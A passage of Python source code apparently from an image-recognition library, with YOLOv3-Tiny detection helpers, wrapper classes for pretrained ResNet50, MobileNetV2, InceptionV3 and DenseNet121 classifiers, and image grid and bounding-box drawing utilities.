2 + new_h, (net_w - new_w) // 2: (net_w - new_w) // 2 + new_w,\r\n :] = resized_image\r\n return canvas\r\n\r\n\r\ndef prepare_image(\r\n image: np.ndarray,\r\n inp_dim: Tuple[int, int]) -> torch.Tensor:\r\n\r\n img = letterbox_image(image, inp_dim)\r\n img = img[:, :, ::-1].transpose((2, 0, 1)).copy()\r\n img = torch.from_numpy(img).float().div(255.0).unsqueeze(0)\r\n return img\r\n\r\n\r\ndef bbox_iou(bbox1: torch.Tensor, bbox2: torch.Tensor, device=\"cpu\"):\r\n\r\n b1_x1, b1_y1, b1_x2, b1_y2 = bbox1[:, 0], bbox1[:, 1], bbox1[:, 2], bbox1[:, 3]\r\n b2_x1, b2_y1, b2_x2, b2_y2 = bbox2[:, 0], bbox2[:, 1], bbox2[:, 2], bbox2[:, 3]\r\n\r\n \r\n inter_rect_x1 = torch.max(b1_x1, b2_x1)\r\n inter_rect_y1 = torch.max(b1_y1, b2_y1)\r\n inter_rect_x2 = torch.min(b1_x2, b2_x2)\r\n inter_rect_y2 = torch.min(b1_y2, b2_y2)\r\n inter_area = torch.max(inter_rect_x2 - inter_rect_x1 + 1, torch.zeros(inter_rect_x2.shape, device=device)) * \\\r\n torch.max(inter_rect_y2 - inter_rect_y1 + 1, torch.zeros(inter_rect_y2.shape, device=device))\r\n\r\n b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1)\r\n b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1)\r\n\r\n return inter_area / (b1_area + b2_area - inter_area)\r\n\r\n\r\ndef transform_prediction(\r\n pred: torch.Tensor,\r\n inp_dim: int,\r\n anchors: Union[List[int], Tuple[int, ...], torch.Tensor],\r\n num_classes: int,\r\n device: str = \"cpu\"\r\n) -> torch.Tensor:\r\n batch_size = pred.shape[0]\r\n grid_size = pred.shape[2]\r\n stride = inp_dim // grid_size\r\n bbox_attrs = 5 + num_classes\r\n num_anchors = len(anchors)\r\n\r\n \r\n pred = pred.view(batch_size, bbox_attrs * num_anchors, grid_size * grid_size)\r\n pred = pred.transpose(1, 2).contiguous()\r\n pred = pred.view(batch_size, grid_size * grid_size * num_anchors, bbox_attrs)\r\n\r\n \r\n \r\n \r\n \r\n anchors = [(a[0] / stride, a[1] / stride) for a in anchors]\r\n\r\n \r\n pred[:, :, 0] = torch.sigmoid(pred[:, :, 0])\r\n pred[:, :, 1] = torch.sigmoid(pred[:, :, 1])\r\n pred[:, :, 4] = torch.sigmoid(pred[:, :, 4])\r\n\r\n \r\n grid = torch.arange(grid_size, dtype=torch.float)\r\n grid = np.arange(grid_size)\r\n x_o, y_o = np.meshgrid(grid, grid)\r\n \r\n\r\n x_offset = torch.FloatTensor(x_o).view(-1, 1).to(device)\r\n y_offset = torch.FloatTensor(y_o).view(-1, 1).to(device)\r\n \r\n \r\n\r\n x_y_offset = torch.cat([x_offset, y_offset], dim=1).repeat(1, num_anchors).view(-1, 2).unsqueeze(0)\r\n pred[:, :, :2] += x_y_offset\r\n\r\n \r\n anchors = torch.FloatTensor(anchors).to(device)\r\n anchors = anchors.repeat(grid_size * grid_size, 1).unsqueeze(0)\r\n pred[:, :, 2:4] = torch.exp(pred[:, :, 2:4]) * anchors\r\n\r\n \r\n pred[:, :, 5:5 + num_classes] = torch.sigmoid(pred[:, :, 5:5 + num_classes])\r\n\r\n \r\n pred[:, :, :4] *= stride\r\n\r\n return pred\r\n\r\n\r\ndef get_predictions(\r\n pred: torch.Tensor,\r\n num_classes: int,\r\n objectness_confidence: float = 0.5,\r\n nms_confidence_level: float = 0.4,\r\n device: str = \"cpu\") -> Union[torch.Tensor, int]:\r\n\r\n conf_mask = (pred[:, :, 4] > objectness_confidence).float().unsqueeze(2)\r\n pred = pred * conf_mask\r\n\r\n bbox_corner = pred.new(pred.shape)\r\n bbox_corner[:, :, 0] = (pred[:, :, 0] - (pred[:, :, 2] / 2)) \r\n bbox_corner[:, :, 1] = (pred[:, :, 1] - (pred[:, :, 3] / 2)) \r\n bbox_corner[:, :, 2] = (pred[:, :, 0] + (pred[:, :, 2] / 2)) \r\n bbox_corner[:, :, 3] = (pred[:, :, 1] + (pred[:, :, 3] / 2)) \r\n pred[:, :, :4] = bbox_corner[:, :, :4]\r\n\r\n output = None\r\n for idx in range(pred.shape[0]):\r\n img_pred = pred[idx]\r\n\r\n max_conf, max_idx = torch.max(img_pred[:, 5:5 + num_classes], 1)\r\n max_conf = max_conf.float().unsqueeze(1).to(device)\r\n max_idx = max_idx.float().unsqueeze(1).to(device)\r\n img_pred = torch.cat([img_pred[:, :5], max_conf, max_idx], 1)\r\n\r\n non_zero_idx = torch.nonzero(img_pred[:, 4]).to(device)\r\n img_pred = img_pred[non_zero_idx.squeeze(), :].view(-1, 7).to(device)\r\n if not img_pred.shape[0]:\r\n continue\r\n\r\n img_classes = torch.unique(img_pred[:, -1]).to(device)\r\n\r\n for cls in img_classes:\r\n class_mask = img_pred * (img_pred[:, -1] == cls).float().unsqueeze(1)\r\n class_mask_idx = torch.nonzero(class_mask[:, -2]).squeeze()\r\n img_pred_class = img_pred[class_mask_idx].view(-1, 7)\r\n\r\n \r\n conf_sort_idx = torch.sort(img_pred_class[:, 4], descending=True)[1]\r\n img_pred_class = img_pred_class[conf_sort_idx]\r\n\r\n for d_idx in range(img_pred_class.shape[0]):\r\n try:\r\n ious = bbox_iou(img_pred_class[d_idx].unsqueeze(0), img_pred_class[d_idx + 1:], device=device)\r\n except (IndexError, ValueError):\r\n break\r\n\r\n \r\n iou_mask = (ious < nms_confidence_level).float().unsqueeze(1)\r\n img_pred_class[d_idx + 1:] *= iou_mask\r\n non_zero_idx = torch.nonzero(img_pred_class[:, 4]).squeeze()\r\n img_pred_class = img_pred_class[non_zero_idx].view(-1, 7)\r\n\r\n batch_idx = img_pred_class.new(img_pred_class.shape[0], 1).fill_(idx)\r\n if isinstance(output, torch.Tensor):\r\n out = torch.cat([batch_idx, img_pred_class], 1)\r\n output = torch.cat([output, out])\r\n else:\r\n output = torch.cat([batch_idx, img_pred_class], 1)\r\n return output\r\n\r\nclass YoloV3Tiny(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n anchors: Union[List[int], Tuple[int, ...]],\r\n num_classes: int = 80,\r\n device: str = \"cpu\"\r\n ):\r\n super().__init__()\r\n\r\n \r\n self.conv1 = ConvLayer(3, 16)\r\n self.maxpool1 = nn.MaxPool2d(2, 2)\r\n self.conv2 = ConvLayer(16, 32)\r\n self.maxpool2 = nn.MaxPool2d(2, 2)\r\n self.conv3 = ConvLayer(32, 64)\r\n self.maxpool3 = nn.MaxPool2d(2, 2)\r\n self.conv4 = ConvLayer(64, 128)\r\n self.maxpool4 = nn.MaxPool2d(2, 2)\r\n self.conv5 = ConvLayer(128, 256)\r\n self.maxpool5 = nn.MaxPool2d(2, 2)\r\n self.conv6 = ConvLayer(256, 512)\r\n self.zeropad = nn.ZeroPad2d((0, 1, 0, 1))\r\n self.maxpool6 = nn.MaxPool2d(2, 1)\r\n self.conv7 = ConvLayer(512, 1024)\r\n self.conv8 = ConvLayer(1024, 256, 1, 1)\r\n self.conv9 = ConvLayer(256, 512)\r\n self.conv10 = ConvLayer(\r\n 512, (3 * (5 + num_classes)), 1, 1,\r\n use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n self.yolo1 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(3, 4, 5), device=device, layer=1\r\n )\r\n \r\n self.conv11 = ConvLayer(256, 128, 1, 1)\r\n self.upsample1 = nn.Upsample(\r\n scale_factor=2, mode=\"nearest\"\r\n \r\n )\r\n \r\n self.conv12 = ConvLayer(384, 256)\r\n self.conv13 = ConvLayer(\r\n 256, (3 * (5 + num_classes)), 1, 1,\r\n use_batch_norm=False,\r\n activation=\"linear\"\r\n )\r\n self.yolo2 = DetectionLayer(\r\n num_classes=num_classes, anchors=anchors,\r\n anchor_masks=(0, 1, 2), device=device, layer=2\r\n )\r\n\r\n def get_loss_layers(self) -> List[torch.Tensor]:\r\n return [self.yolo1, self.yolo2]\r\n\r\n def __route_layer(self, y1: torch.Tensor, y2: Optional[torch.Tensor] = None) -> torch.Tensor:\r\n if isinstance(y2, torch.Tensor):\r\n return torch.cat([y1, y2], 1)\r\n return y1\r\n\r\n def forward(self, x: torch.Tensor) -> torch.Tensor:\r\n y = self.maxpool2(self.conv2(self.maxpool1(self.conv1(x))))\r\n y = self.maxpool4(self.conv4(self.maxpool3(self.conv3(y))))\r\n r1 = self.conv5(y) \r\n y = self.zeropad(self.conv6(self.maxpool5(r1)))\r\n y = self.conv7(self.maxpool6(y))\r\n r2 = self.conv8(y) \r\n y = self.conv10(self.conv9(r2))\r\n\r\n \r\n out = self.yolo1(y)\r\n y = self.conv11(self.__route_layer(r2))\r\n y = self.__route_layer(self.upsample1(y), r1)\r\n y = self.conv13(self.conv12(y))\r\n\r\n \r\n out = torch.cat([out, self.yolo2(y)], 1)\r\n\r\n return out\r\nwarnings.filterwarnings(\"once\", category=ResourceWarning)\r\n\r\n\r\nclass ResNet50Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.resnet50(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weights = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n\r\n if not self.__has_loaded_weights:\r\n try:\r\n self.__model.load_state_dict(\r\n torch.load(self.__model_path, map_location=self.__device)\r\n )\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n\r\n if not self.__has_loaded_weights:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path are yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n warnings.warn(\r\n \"Model path isn't set, pretrained weights aren't used.\",\r\n ResourceWarning\r\n )\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\n\r\n\r\nclass MobileNetV2Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.mobilenet_v2(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weight = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a valid path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n\r\n if not self.__has_loaded_weights:\r\n try:\r\n self.__model.load_state_dict(\r\n torch.load(self.__model_path, map_location=self.__device)\r\n )\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n\r\n if not self.__has_loaded_weights:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path are yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n warnings.warn(\r\n \"Model path isn't set, pretrained weights aren't used.\",\r\n ResourceWarning\r\n )\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\n\r\n\r\nclass InceptionV3Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.inception_v3(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(299),\r\n transforms.CenterCrop(299),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weights = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n\r\n if not self.__has_loaded_weights:\r\n try:\r\n self.__model.load_state_dict(\r\n torch.load(self.__model_path, map_location=self.__device)\r\n )\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n if not self.__has_loaded_weights:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path are yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n warnings.warn(\r\n \"Model path isn't set, pretrained weights aren't used.\",\r\n ResourceWarning\r\n )\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n print(images.shape)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n with open(os.path.join(str(Path(__file__).resolve().parent.parent), \"imagenet_classes.txt\")) as f:\r\n categories = [c.strip() for c in f.readlines()]\r\n predictions = [\r\n [\r\n (categories[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\n\r\n\r\ndef read_file(path: str) -> torch.Tensor:\r\n\r\n data = torch.ops.image.read_file(path)\r\n return data\r\n\r\n\r\ndef decode_image(input: torch.Tensor, mode: ImageReadMode = ImageReadMode.UNCHANGED) -> torch.Tensor:\r\n\r\n output = torch.ops.image.decode_image(input, mode.value)\r\n return output\r\n\r\n\r\ndef read_image(path: str, mode: ImageReadMode = ImageReadMode.UNCHANGED) -> torch.Tensor:\r\n\r\n data = read_file(path)\r\n return decode_image(data, mode)\r\n\r\n\r\ndef _generate_color_palette(num_objects: int):\r\n palette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\r\n return [tuple((i * palette) % 255) for i in range(num_objects)]\r\n\r\n\r\n@torch.no_grad()\r\ndef make_grid(\r\n tensor: Union[torch.Tensor, List[torch.Tensor]],\r\n nrow: int = 8,\r\n padding: int = 2,\r\n normalize: bool = False,\r\n value_range: Optional[Tuple[int, int]] = None,\r\n scale_each: bool = False,\r\n pad_value: float = 0.0,\r\n **kwargs,\r\n) -> torch.Tensor:\r\n if not (torch.is_tensor(tensor) or (isinstance(tensor, list) and all(torch.is_tensor(t) for t in tensor))):\r\n raise TypeError(f\"tensor or list of tensors expected, got {type(tensor)}\")\r\n\r\n if \"range\" in kwargs.keys():\r\n warnings.warn(\r\n \"The parameter 'range' is deprecated since 0.12 and will be removed in 0.14. \"\r\n \"Please use 'value_range' instead.\"\r\n )\r\n value_range = kwargs[\"range\"]\r\n\r\n \r\n if isinstance(tensor, list):\r\n tensor = torch.stack(tensor, dim=0)\r\n\r\n if tensor.dim() == 2: \r\n tensor = tensor.unsqueeze(0)\r\n if tensor.dim() == 3: \r\n if tensor.size(0) == 1: \r\n tensor = torch.cat((tensor, tensor, tensor), 0)\r\n tensor = tensor.unsqueeze(0)\r\n\r\n if tensor.dim() == 4 and tensor.size(1) == 1: \r\n tensor = torch.cat((tensor, tensor, tensor), 1)\r\n\r\n if normalize is True:\r\n tensor = tensor.clone() \r\n if value_range is not None:\r\n assert isinstance(\r\n value_range, tuple\r\n ), \"value_range has to be a tuple (min, max) if specified. min and max are numbers\"\r\n\r\n def norm_ip(img, low, high):\r\n img.clamp_(min=low, max=high)\r\n img.sub_(low).div_(max(high - low, 1e-5))\r\n\r\n def norm_range(t, value_range):\r\n if value_range is not None:\r\n norm_ip(t, value_range[0], value_range[1])\r\n else:\r\n norm_ip(t, float(t.min()), float(t.max()))\r\n\r\n if scale_each is True:\r\n for t in tensor: \r\n norm_range(t, value_range)\r\n else:\r\n norm_range(tensor, value_range)\r\n\r\n assert isinstance(tensor, torch.Tensor)\r\n if tensor.size(0) == 1:\r\n return tensor.squeeze(0)\r\n\r\n \r\n nmaps = tensor.size(0)\r\n xmaps = min(nrow, nmaps)\r\n ymaps = int(math.ceil(float(nmaps) / xmaps))\r\n height, width = int(tensor.size(2) + padding), int(tensor.size(3) + padding)\r\n num_channels = tensor.size(1)\r\n grid = tensor.new_full((num_channels, height * ymaps + padding, width * xmaps + padding), pad_value)\r\n k = 0\r\n for y in range(ymaps):\r\n for x in range(xmaps):\r\n if k >= nmaps:\r\n break\r\n grid.narrow(1, y * height + padding, height - padding).narrow( \r\n 2, x * width + padding, width - padding\r\n ).copy_(tensor[k])\r\n k = k + 1\r\n return grid\r\n\r\n\r\n@torch.no_grad()\r\ndef draw_bounding_boxes_and_labels(\r\n image: torch.Tensor,\r\n boxes: torch.Tensor,\r\n draw_boxes: bool,\r\n labels: Optional[List[str]] = None,\r\n label_color: Optional[Union[List[Union[str, Tuple[int, int, int]]], str, Tuple[int, int, int]]] = None,\r\n box_color: Optional[Union[List[Union[str, Tuple[int, int, int]]], str, Tuple[int, int, int]]] = None,\r\n fill: Optional[bool] = False,\r\n width: int = 1,\r\n font: Optional[str] = None,\r\n font_size: int = 10,\r\n) -> torch.Tensor:\r\n\r\n if not isinstance(image, torch.Tensor):\r\n raise TypeError(f\"Tensor expected, got {type(image)}\")\r\n elif image.dtype != torch.uint8:\r\n raise ValueError(f\"Tensor uint8 expected, got {image.dtype}\")\r\n elif image.dim() != 3:\r\n raise ValueError(\"Pass individual images, not batches\")\r\n elif image.size(0) not in {1, 3}:\r\n raise ValueError(\"Only grayscale and RGB images are supported\")\r\n\r\n num_boxes = boxes.shape[0]\r\n\r\n if labels is None:\r\n labels: Union[List[str], List[None]] = [None] * num_boxes \r\n elif len(labels) != num_boxes:\r\n raise ValueError(\r\n f\"Number of boxes ({num_boxes}) and labels ({len(labels)}) mismatch. Please specify labels for each box.\"\r\n )\r\n\r\n \r\n if image.size(0) == 1:\r\n image = torch.tile(image, (3, 1, 1))\r\n\r\n ndarr = image.permute(1, 2, 0).cpu().numpy()\r\n img_to_draw = Image.fromarray(ndarr)\r\n img_boxes = boxes.to(torch.int64).tolist()\r\n\r\n if fill:\r\n draw = ImageDraw.Draw(img_to_draw, \"RGBA\")\r\n else:\r\n draw = ImageDraw.Draw(img_to_draw)\r\n\r\n txt_font = ImageFont.load_default() if font is None else ImageFont.truetype(font=font, size=font_size)\r\n\r\n for bbox, label in zip(img_boxes, labels):\r\n if draw_boxes:\r\n if fill:\r\n fill_color = label_color + (100,)\r\n draw.rectangle(bbox, width=width, outline=label_color, fill=fill_color)\r\n else:\r\n draw.rectangle(bbox, width=width, outline=box_color)\r\n\r\n if label is not None:\r\n margin = width + 1\r\n draw.text((bbox[0] + margin, bbox[1] + margin), label, fill=label_color, font=txt_font)\r\n\r\n return torch.from_numpy(np.array(img_to_draw)).permute(2, 0, 1).to(dtype=torch.uint8)\r\n\r\n\r\n@torch.no_grad()\r\ndef tensor_to_ndarray(\r\n tensor: Union[torch.Tensor, List[torch.Tensor]],\r\n **kwargs,\r\n) -> None:\r\n\r\n grid = make_grid(tensor, **kwargs)\r\n \r\n ndarr = grid.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to(\"cpu\", torch.uint8).numpy()\r\n\r\n return ndarr\r\n\r\n\r\nclass DenseNet121Pretrained:\r\n\r\n def __init__(self, label_path: str) -> None:\r\n self.__model = torchvision.models.densenet121(pretrained=False)\r\n self.__classes = self.__load_classes(label_path)\r\n self.__has_loaded_weights = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image(self, image_path: str) -> Tuple[List[str], torch.Tensor]:\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n fnames = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if os.path.isfile(image_path):\r\n img = Image.open(image_path).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(os.path.basename(image_path))\r\n\r\n elif os.path.isdir(image_path):\r\n for file in os.listdir(image_path):\r\n if os.path.isfile(os.path.join(image_path, file)) and \\\r\n file.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = Image.open(os.path.join(image_path, file)).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n fnames.append(file)\r\n if images:\r\n return fnames, torch.stack(images)\r\n raise RuntimeError(\r\n f\"Error loading images from {os.path.abspath(image_path)}.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n \r\n model_path = property(\r\n fget=lambda self: self.__model_path,\r\n fset=lambda self, path: self.set_model_path(path),\r\n doc=\"Path containing the pretrained weight.\"\r\n )\r\n\r\n def set_model_path(self, path: str) -> None:\r\n if os.path.isfile(path):\r\n self.__model_path = path\r\n self.__has_loaded_weights = False\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a path to the pretrianed weight file.\"\r\n )\r\n\r\n def load_model(self) -> None:\r\n if not self.__has_loaded_weights:\r\n try:\r\n import re\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n self.__model.load_state_dict(state_dict)\r\n self.__has_loaded_weights = True\r\n self.__model.eval()\r\n except Exception:\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classify(self, image_path: str, top_n: int = 5, verbose: bool = True) -> List[List[Tuple[str, str]]]:\r\n if not self.__has_loaded_weights:\r\n warnings.warn(\"Pretrained weights aren't loaded\", ResourceWarning)\r\n\r\n fnames, images = self.__load_image(image_path)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n top5_prob, top5_catid = torch.topk(probabilities, 5)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[top5_catid[i][j]], f\"{top5_prob[i][j].item() * 100:.5f}%\")\r\n for j in range(top5_prob.shape[1])\r\n ]\r\n for i in range(top5_prob.shape[0])\r\n ]\r\n\r\n if verbose:\r\n for idx, pred in enumerate(predictions):\r\n print(\"-\" * 50, f\"Top 5 predictions for {fnames[idx]}\", \"-\" * 50, 